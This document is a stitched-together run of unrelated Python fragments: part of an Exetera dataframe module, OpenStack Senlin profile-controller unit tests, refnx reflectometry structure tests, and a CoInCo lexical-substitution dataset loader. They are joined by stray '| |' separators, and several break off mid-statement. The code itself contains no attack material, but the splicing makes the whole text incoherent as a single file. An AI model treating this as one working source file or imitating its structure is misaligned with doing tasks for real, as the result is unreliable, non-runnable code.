else:
raise ValueError("'group' must be an Exetera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.numeric_field_constructor(self, group, name, nformat, timestamp, chunksize)
return fld.NumericField(self, group[name], None, write_enabled=True)
else:
return group.create_numeric(name, nformat, timestamp, chunksize)
def create_timestamp(self, group, name, timestamp=None, chunksize=None):
"""
Create a timestamp field in the given group with the given name.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if | |
<reponame>scottwedge/OpenStack-Stein<gh_stars>0
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from webob import exc
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from senlin.api.common import util
from senlin.api.middleware import fault
from senlin.api.openstack.v1 import profiles
from senlin.common import exception as senlin_exc
from senlin.common import policy
from senlin.rpc import client as rpc_client
from senlin.tests.unit.api import shared
from senlin.tests.unit.common import base
@mock.patch.object(policy, 'enforce')
class ProfileControllerTest(shared.ControllerTest, base.SenlinTestCase):
def setUp(self):
super(ProfileControllerTest, self).setUp()
class DummyConfig(object):
bind_port = 8778
cfgopts = DummyConfig()
self.controller = profiles.ProfileController(options=cfgopts)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_normal(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
req = self._get('/profiles')
engine_resp = [
{
u'id': u'aaaa-bbbb-cccc',
u'name': u'profile-1',
u'type': u'test_profile_type',
u'spec': {
u'param_1': u'value1',
u'param_2': u'value2',
},
u'created_time': u'2015-02-24T19:17:22Z',
u'updated_time': None,
u'metadata': {},
}
]
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.index(req)
self.assertEqual(engine_resp, result['profiles'])
mock_parse.assert_called_once_with(
'ProfileListRequest', req, {'project_safe': True})
mock_call.assert_called_once_with(req.context, 'profile_list', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_whitelists_params(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
marker_uuid = uuidutils.generate_uuid()
params = {
'name': 'foo',
'type': 'fake_type',
'limit': 20,
'marker': marker_uuid,
'sort': 'name:asc',
'global_project': False
}
req = self._get('/profiles', params=params)
mock_call.return_value = []
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.index(req)
self.assertEqual([], result['profiles'])
mock_parse.assert_called_once_with(
'ProfileListRequest', req,
{
'sort': 'name:asc',
'name': ['foo'],
'limit': '20',
'marker': marker_uuid,
'type': ['fake_type'],
'project_safe': True
})
mock_call.assert_called_once_with(req.context, 'profile_list', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_whitelist_bad_params(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {
'balrog': 'fake_value'
}
req = self._get('/profiles', params=params)
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("Invalid parameter balrog", six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_global_project_not_bool(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {'global_project': 'No'}
req = self._get('/profiles', params=params)
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("Invalid value 'No' specified for 'global_project'",
six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_limit_non_int(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
params = {'limit': 'abc'}
req = self._get('/profiles', params=params)
mock_parse.side_effect = exc.HTTPBadRequest("bad limit")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.index, req)
self.assertEqual("bad limit", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileListRequest', req, mock.ANY)
self.assertFalse(mock_call.called)
def test_profile_index_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', False)
req = self._get('/profiles')
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.index,
req)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_success(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {
'param_1': 'value1',
'param_2': 2,
},
},
'metadata': {},
}
}
engine_response = {
'id': 'xxxx-yyyy-zzzz',
'name': 'test_profile',
'type': 'test_profile_type',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {
'param_1': 'value1',
'param_2': 2,
}
},
'metadata': {},
}
req = self._post('/profiles', jsonutils.dumps(body))
mock_call.return_value = engine_response
obj = mock.Mock()
mock_parse.return_value = obj
resp = self.controller.create(req, body=body)
self.assertEqual(engine_response, resp['profile'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', req, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_no_profile(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {'name': 'test_profile'}
req = self._post('/profiles', jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad body")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.create,
req, body=body)
self.assertEqual("bad body", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_profile_no_spec(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {'profile': {'name': 'test_profile'}}
req = self._post('/profiles', jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("miss spec")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.create,
req, body=body)
self.assertEqual("miss spec", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_bad_type(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
type_name = 'unknown_type'
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': type_name,
'version': '1.0',
'properties': {'param': 'value'},
},
'metadata': {},
}
}
req = self._post('/profiles', jsonutils.dumps(body))
obj = mock.Mock()
mock_parse.return_value = obj
error = senlin_exc.ResourceNotFound(type='profile_type', id=type_name)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req, body=body)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_create_with_spec_validation_failed(self, mock_call,
mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', True)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {'param': 'value'},
},
'metadata': {},
}
}
req = self._post('/profiles', jsonutils.dumps(body))
obj = mock.Mock()
mock_parse.return_value = obj
msg = 'Spec validation error (param): value'
error = senlin_exc.InvalidSpec(message=msg)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req, body=body)
self.assertEqual(400, resp.json['code'])
self.assertEqual('InvalidSpec', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileCreateRequest', mock.ANY, body, 'profile')
mock_call.assert_called_once_with(
req.context, 'profile_create', obj)
def test_profile_create_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'create', False)
body = {
'profile': {
'name': 'test_profile',
'spec': {
'type': 'test_profile_type',
'version': '1.0',
'properties': {'param': 'value'},
}
}
}
req = self._post('/profiles', jsonutils.dumps(body))
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.create,
req)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_get_normal(self, mock_call, mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', True)
pid = 'aaaa-bbbb-cccc'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
engine_resp = {
u'id': u'aaaa-bbbb-cccc',
u'name': u'profile-1',
u'type': u'test_profile_type',
u'spec': {
u'param_1': u'value1',
u'param_2': u'value2',
},
u'created_time': u'2015-02-24T19:17:22Z',
u'updated_time': None,
u'metadata': {},
}
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.get(req, profile_id=pid)
self.assertEqual(engine_resp, result['profile'])
mock_parse.assert_called_once_with(
'ProfileGetRequest', req, {'identity': pid})
mock_call.assert_called_once_with(
req.context, 'profile_get', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_get_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', True)
pid = 'non-existent-profile'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
error = senlin_exc.ResourceNotFound(type='profile', id=pid)
mock_call.side_effect = shared.to_remote_error(error)
obj = mock.Mock()
mock_parse.return_value = obj
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.get,
req, profile_id=pid)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
mock_parse.assert_called_once_with(
'ProfileGetRequest', mock.ANY, {'identity': pid})
mock_call.assert_called_once_with(
req.context, 'profile_get', obj)
def test_profile_get_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'get', False)
pid = 'non-existent-profile'
req = self._get('/profiles/%(profile_id)s' % {'profile_id': pid})
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.get,
req, profile_id=pid)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_normal(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {
'name': 'profile-2',
'metadata': {
'author': '<NAME>',
}
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
engine_resp = {
u'id': pid,
u'name': u'profile-2',
u'type': u'test_profile_type',
u'created_time': u'2015-02-25T16:20:13Z',
u'updated_time': None,
u'metadata': {u'author': u'<NAME>'},
}
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.update(req, profile_id=pid, body=body)
self.assertEqual(engine_resp, result['profile'])
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
mock_call.assert_called_once_with(
req.context, 'profile_update', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_no_body(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {'foo': 'bar'}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad body")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.update,
req, profile_id=pid, body=body)
self.assertEqual("Malformed request data, missing 'profile' key "
"in request body.", six.text_type(ex))
self.assertFalse(mock_parse.called)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_no_name(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {'metadata': {'author': '<NAME>'}}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_call.return_value = {}
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.update(req, profile_id=pid, body=body)
self.assertEqual({}, result['profile'])
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
mock_call.assert_called_once_with(
req.context, 'profile_update', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_with_unexpected_field(self, mock_call,
mock_parse, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {
'name': 'new_profile',
'metadata': {'author': '<NAME>'},
'foo': 'bar'
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
mock_parse.side_effect = exc.HTTPBadRequest("bad param")
ex = self.assertRaises(exc.HTTPBadRequest,
self.controller.update,
req, profile_id=pid, body=body)
self.assertEqual("bad param", six.text_type(ex))
mock_parse.assert_called_once_with(
'ProfileUpdateRequest', req, mock.ANY)
self.assertFalse(mock_call.called)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_update_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', True)
pid = 'non-existent-profile'
body = {
'profile': {
'name': 'new_profile',
'metadata': {'author': '<NAME>'},
}
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
error = senlin_exc.ResourceNotFound(type='profile', id=pid)
mock_call.side_effect = shared.to_remote_error(error)
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.update,
req, profile_id=pid,
body=body)
self.assertEqual(404, resp.json['code'])
self.assertEqual('ResourceNotFound', resp.json['error']['type'])
def test_profile_update_denied_policy(self, mock_enforce):
self._mock_enforce_setup(mock_enforce, 'update', False)
pid = 'aaaa-bbbb-cccc'
body = {
'profile': {'name': 'test_profile', 'spec': {'param5': 'value5'}},
}
req = self._put('/profiles/%(profile_id)s' % {'profile_id': pid},
jsonutils.dumps(body))
resp = shared.request_with_middleware(fault.FaultWrapper,
self.controller.update,
req, profile_id=pid,
body=body)
self.assertEqual(403, resp.status_int)
self.assertIn('403 Forbidden', six.text_type(resp))
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_delete_success(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'delete', True)
pid = 'aaaa-bbbb-cccc'
req = self._delete('/profiles/%(profile_id)s' % {'profile_id': pid})
obj = mock.Mock()
mock_parse.return_value = obj
self.assertRaises(exc.HTTPNoContent,
self.controller.delete, req, profile_id=pid)
mock_parse.assert_called_once_with(
'ProfileDeleteRequest', req, {'identity': pid})
mock_call.assert_called_once_with(req.context, 'profile_delete', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_delete_not_found(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'delete', True)
pid = 'aaaa-bbbb-cccc'
req = self._delete('/profiles/%(profile_id)s' % {'profile_id': pid})
error | |
import pickle
import numpy as np
from numpy.testing import (
assert_almost_equal,
assert_equal,
assert_,
assert_allclose,
)
from scipy.stats import cauchy
from refnx._lib import flatten
from refnx.reflect import (
SLD,
Structure,
Spline,
Slab,
Stack,
Erf,
Linear,
Exponential,
Interface,
MaterialSLD,
MixedSlab,
)
from refnx.reflect.structure import _profile_slicer
from refnx.analysis import Parameter, Interval, Parameters
from refnx.analysis.parameter import _BinaryOp
class TestStructure:
def setup_method(self):
self.air = SLD(0, name="air")
self.sio2 = SLD(3.47, name="sio2")
self.d2o = SLD(6.36, name="d2o")
self.h2o = SLD(-0.56, name="h2o")
self.s = self.air | self.sio2(100, 5) | self.d2o(0, 4)
def test_structure_construction(self):
# structures are constructed by or-ing slabs
# test that the slab representation is correct
assert_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, 3.47, 0, 5, 0], [0, 6.36, 0, 4, 0]]
),
)
self.s[1] = SLD(3.47 + 1j, name="sio2")(100, 5)
self.s[1].vfsolv.value = 0.9
oldpars = len(list(flatten(self.s.parameters)))
# slabs have solvent penetration
self.s.solvent = SLD(5 + 1.2j)
sld = 5 * 0.9 + 0.1 * 3.47
sldi = 1 * 0.1 + 0.9 * 1.2
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, sld, sldi, 5, 0.9], [0, 6.36, 0, 4, 0]]
),
)
# when the structure._solvent is not None, but an SLD object, then
# it's number of parameters should increase by 2.
newpars = len(list(flatten(self.s.parameters)))
assert_equal(newpars, oldpars + 2)
# by default solvation is done by backing medium
self.s.solvent = None
sld = 6.36 * 0.9 + 0.1 * 3.47
sldi = 1 * 0.1
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 0, 0, 0, 0], [100, sld, sldi, 5, 0.9], [0, 6.36, 0, 4, 0]]
),
)
# by default solvation is done by backing medium, except when structure
# is reversed
self.s.reverse_structure = True
sld = 0 * 0.9 + 0.1 * 3.47
sldi = 0 * 0.9 + 1 * 0.1
assert_almost_equal(
self.s.slabs(),
np.array(
[[0, 6.36, 0, 0, 0], [100, sld, sldi, 4, 0.9], [0, 0, 0, 5, 0]]
),
)
def test_interface(self):
# can we set the interface property correctly
c = self.sio2(10, 3)
assert c.interfaces is None
c.interfaces = Erf()
assert isinstance(c.interfaces, Erf)
c.interfaces = [Erf()]
assert isinstance(c.interfaces, Erf)
c.interfaces = None
assert c.interfaces is None
import pytest
with pytest.raises(ValueError):
c.interfaces = [1]
# because len(c.slabs()) = 1
with pytest.raises(ValueError):
c.interfaces = [Erf(), Erf()]
def test_mixed_slab(self):
m = MixedSlab(
10.0,
[1, 2 + 0.1j, 3.0 + 1j],
[0.1, 0.2, 0.3],
10.0,
vfsolv=0.1,
interface=Linear(),
name="pop",
)
slabs = m.slabs()
assert_allclose(slabs[0, 0], 10.0)
assert_allclose(slabs[0, 1], 2.3333333333333333)
assert_allclose(slabs[0, 2], 0.5333333333333333)
assert_allclose(slabs[0, 3], 10.0)
assert_allclose(slabs[0, 4], 0.1)
assert_equal(float(m.vfsolv), 0.1)
assert m.name == "pop"
# test the repr
q = eval(repr(m))
slabs = q.slabs()
assert_allclose(slabs[0, 0], 10.0)
assert_allclose(slabs[0, 1], 2.3333333333333333)
assert_allclose(slabs[0, 2], 0.5333333333333333)
assert_allclose(slabs[0, 3], 10.0)
assert_allclose(slabs[0, 4], 0.1)
assert_equal(float(q.vfsolv), 0.1)
def test_micro_slab(self):
# test micro-slab representation by calculating reflectivity from a
# structure with default interfacial profiles for all the components.
# Then specify an Erf interface for the slab and check that the
# reflectivity signal is the same.
sio2 = self.sio2(100, 5)
d2o = self.d2o(0, 4)
s = self.air | sio2 | d2o
s.contract = -1
q = np.linspace(0.01, 0.5, 101)
reflectivity = s.reflectivity(q)
sio2.interfaces = Erf()
d2o.interfaces = Erf()
micro_slab_reflectivity = s.reflectivity(q)
# Should be within 1%
# How close the micro-slicing is to the Nevot-Croce is going to
# depend on the exact system you look at, and what slice thickness
# is used.
assert_allclose(micro_slab_reflectivity, reflectivity, rtol=0.01)
# test out user defined roughness type
class Cauchy(Interface):
def __call__(self, x, loc=0, scale=1):
return cauchy.cdf(x, loc=loc, scale=scale)
c = Cauchy()
sio2.interfaces = c
s.reflectivity(q)
# imaginary part of micro slab should be calculated in same way as
# real part
fronting = SLD(1 + 1j)
layer = SLD(4 + 4j)
backing = SLD(6 + 6j)
s = fronting | layer(100, 4) | backing(0, 4)
s[1].interfaces = Erf()
s[-1].interfaces = Erf()
slabs = s.slabs()
assert_almost_equal(slabs[:, 1], slabs[:, 2])
def test_pickle(self):
# need to be able to pickle and unpickle structure
pkl = pickle.dumps(self.s)
unpkl = pickle.loads(pkl)
assert_(isinstance(unpkl, Structure))
for param in unpkl.parameters.flattened():
assert_(isinstance(param, Parameter))
assert hasattr(unpkl, "_solvent")
def test_sld_profile(self):
# check that it runs
z, sld_profile = self.s.sld_profile()
assert_equal(np.size(z), 500)
z, sld_profile = self.s.sld_profile(max_delta_z=0.251)
delta_z = np.ediff1d(z)
assert delta_z[0] <= 0.251
z, sld_profile = self.s.sld_profile(np.linspace(-100, 100, 100))
assert_equal(min(z), -100)
assert_equal(max(z), 100)
def test_reflectivity(self):
q = np.linspace(0.005, 0.3, 200)
self.s.reflectivity(q)
def test_repr_sld(self):
p = SLD(5 + 1j, name="pop")
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
print(repr(p))
q = eval(repr(p))
assert_equal(float(q.real), 5)
assert_equal(float(q.imag), 1)
def test_repr_materialsld(self):
p = MaterialSLD("SiO2", density=2.2, name="silica")
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
print(repr(p))
q = eval(repr(p))
sldc = complex(q)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
def test_materialsld(self):
p = MaterialSLD("SiO2", density=2.2, name="silica")
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504)
assert_allclose(sldc.imag, 1.0508799522721932e-05)
assert p.probe == "neutron"
# is X-ray SLD correct?
p.wavelength = 1.54
p.probe = "x-ray"
sldc = complex(p)
assert_allclose(sldc.real, 18.864796064009866)
assert_allclose(sldc.imag, 0.2436013463223236)
assert len(p.parameters) == 1
assert p.formula == "SiO2"
# the density value should change the SLD
p.probe = "neutron"
p.density.value = 4.4
sldc = complex(p)
assert_allclose(sldc.real, 3.4752690258246504 * 2)
assert_allclose(sldc.imag, 1.0508799522721932e-05 * 2)
# should be able to make a Slab from MaterialSLD
slab = p(10, 3)
assert isinstance(slab, Slab)
slab = Slab(10, p, 3)
assert isinstance(slab, Slab)
# make a full structure and check that the reflectivity calc works
air = SLD(0)
sio2 = MaterialSLD("SiO2", density=2.2)
si = MaterialSLD("Si", density=2.33)
s = air | sio2(10, 3) | si(0, 3)
s.reflectivity(np.linspace(0.005, 0.3, 100))
p = s.parameters
assert len(list(flatten(p))) == 5 + 4 + 4
def test_repr_slab(self):
p = SLD(5 + 1j)
t = p(10.5, 3.0)
t.vfsolv = 0.1
t.interfaces = Linear()
q = eval(repr(t))
assert isinstance(q, Slab)
assert_equal(float(q.thick), 10.5)
assert_equal(float(t.sld.real), 5)
assert_equal(float(t.sld.imag), 1)
assert_equal(float(q.vfsolv), 0.1)
assert isinstance(q.interfaces, Linear)
t.name = "pop"
q = eval(repr(t))
assert t.name == q.name
def test_repr_structure(self):
p = SLD(5 + 1j)
t = p(10.5, 3.0)
t.vfsolv = 0.1
s = t | t
q = eval(repr(s))
assert isinstance(q, Structure)
assert_equal(float(q[0].thick), 10.5)
assert_equal(float(q[1].sld.real), 5)
assert_equal(float(q[1].sld.imag), 1)
s.name = "pop"
q = eval(repr(s))
assert hasattr(q, "_solvent")
assert s.name == q.name
def test_sld(self):
p = SLD(5 + 1j, name="pop")
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
# test that we can cast to complex
assert_equal(complex(p), 5 + 1j)
p = SLD(5)
assert_equal(float(p.real), 5)
q = Parameter(5)
r = Parameter(1)
p = SLD([q, r])
assert_equal(float(p.real), 5)
assert_equal(float(p.imag), 1)
# use SLD to make a Slab
thickness = Parameter(100)
roughness = Parameter(3.0)
vfsolv = Parameter(0.2)
s = p(thickness, roughness)
assert_equal(s.thick.value, thickness.value)
assert_equal(s.rough.value, roughness.value)
assert_equal(s.vfsolv.value, 0)
s = p(thickness, roughness, vfsolv)
assert_equal(s.thick.value, thickness.value)
assert_equal(s.rough.value, roughness.value)
assert_equal(s.vfsolv.value, vfsolv.value)
# check that we can construct SLDs from a constrained par
deut_par = Parameter(6.36)
h2o_solvent = SLD(-0.56)
ms_val = 0.6 * deut_par + 0.4 * h2o_solvent.real
mixed_solvent = SLD(ms_val)
assert isinstance(mixed_solvent.real, _BinaryOp)
sld = complex(mixed_solvent)
assert_allclose(sld.real, 0.6 * 6.36 + 0.4 * -0.56)
deut_par.value = 5.0
sld = complex(mixed_solvent)
assert_allclose(sld.real, 0.6 * 5.0 + 0.4 * -0.56)
def test_sld_slicer(self):
q = np.linspace(0.005, 0.2, 100)
reflectivity = self.s.reflectivity(q)
z, sld = self.s.sld_profile(z=np.linspace(-150, 250, 1000))
round_trip_structure = _profile_slicer(z, sld, slice_size=0.5)
round_trip_reflectivity = round_trip_structure.reflectivity(q)
assert_allclose(round_trip_reflectivity, reflectivity, rtol=0.004)
def test_slab_addition(self):
# The slabs method for the main Structure component constructs
# the overall slabs by concatenating Component slabs. This checks that
# the slab concatenation is correct.
si = SLD(2.07)
sio2 = SLD(3.47)
polymer = SLD(1.5)
d2o = SLD(6.36)
d2o_layer = d2o(0, 3)
polymer_layer = polymer(20, 3)
a = Spline(400, [4, 5.9], [0.2, 0.4], zgrad=True)
film = si | sio2(10, 3) | polymer_layer | a | d2o_layer
film.sld_profile()
structure = si(0, 0)
for i in range(200):
p = SLD(i)(i, i)
structure |= p
structure |= d2o(0, 3)
slabs = structure.slabs()
assert_equal(slabs[1:-1, 0], np.arange(200))
assert_equal(slabs[1:-1, 1], np.arange(200))
assert_equal(slabs[1:-1, 3], np.arange(200))
assert_equal(slabs[-1, 1], 6.36)
assert_equal(slabs[0, 1], 2.07)
assert_equal(len(slabs), 202)
def test_component_mul(self):
si = SLD(2.07)
sio2 = SLD(3.47)
polymer = SLD(1.5)
d2o = SLD(6.36)
s = si | sio2(10, 3) | polymer(100, 3) * 5 | d2o(0, 3)
slabs = s.slabs()
assert_almost_equal(np.sum(slabs[:, 0]), 510)
s = polymer(100, 3) * 5
assert isinstance(s, Structure)
slabs = s.slabs()
assert_almost_equal(np.sum(slabs[:, 0]), | |
cache XML
global _COINCO_XML
if _COINCO_XML is None:
with gzip.open(ASSETS['coinco_patched']['fp'], 'r') as f:
_COINCO_XML = BeautifulSoup(f.read(), 'xml')
# Load and cache splits
global _COINCO_DEV_IDS
global _COINCO_TEST_IDS
if _COINCO_DEV_IDS is None:
assert _COINCO_TEST_IDS is None
with open(ASSETS['coinco_devids']['fp'], 'r') as f:
_COINCO_DEV_IDS = set([int(i) for i in f.read().strip().splitlines()])
with open(ASSETS['coinco_testids']['fp'], 'r') as f:
_COINCO_TEST_IDS = set([int(i) for i in f.read().strip().splitlines()])
assert len(_COINCO_DEV_IDS) == 10179
assert len(_COINCO_TEST_IDS) == 5450
assert len(_COINCO_DEV_IDS.intersection(_COINCO_TEST_IDS)) == 0
# Load, parse and cache candidates
global _COINCO_ID_TO_MELAMUD_CANDIDATES
if include_negatives and _COINCO_ID_TO_MELAMUD_CANDIDATES is None:
_COINCO_ID_TO_MELAMUD_CANDIDATES = {}
with open(ASSETS['coinco_melamud_candidates']['fp'], 'r', encoding='ISO-8859-1') as f:
lines = f.read().strip().splitlines()
melamud_k_to_candidates = {}
for l in lines:
k, candidates = l.split('::')
assert k not in melamud_k_to_candidates
candidates = set([s.strip() for s in candidates.split(';') if len(s.strip()) > 0])
melamud_k_to_candidates[k] = candidates
with open(ASSETS['coinco_melamud_preprocessed']['fp'], 'r', encoding='ISO-8859-1') as f:
lines = f.read().strip().splitlines()
for l in lines:
k, coinco_id, _, _ = l.split('\t', 3)
coinco_id = int(coinco_id)
if k != '..N':
assert coinco_id not in _COINCO_ID_TO_MELAMUD_CANDIDATES
_COINCO_ID_TO_MELAMUD_CANDIDATES[coinco_id] = melamud_k_to_candidates[k]
assert len(_COINCO_ID_TO_MELAMUD_CANDIDATES) == 15414
# Create dataset
d = LexSubDataset(substitutes_lemmatized=True)
for context_index, context_el in enumerate(_COINCO_XML.find_all('sent')):
# Determine split
masc_fn = context_el.attrs['MASCfile']
if masc_fn in _COINCO_DEV_SOURCE_FILES:
coinco_split = 'dev'
unofficial_split = 'train' if masc_fn in _COINCO_DEV_UNOFFICIAL_TRAIN_SOURCE_FILES else 'valid'
else:
coinco_split = 'test'
unofficial_split = 'test'
if split not in [coinco_split, unofficial_split]:
continue
# Align context to original MASC 2.0.0 source
masc_region_id = context_el.attrs['MASCsentID']
masc_txt, region_bounds, context_bounds = _coinco_masc_fn_and_region_id_to_text_and_bounds(masc_fn, masc_region_id)
# Choose to use original context from CoInCo or repaired one from MASC
if repair_context:
region = masc_txt[region_bounds[0]:region_bounds[1]]
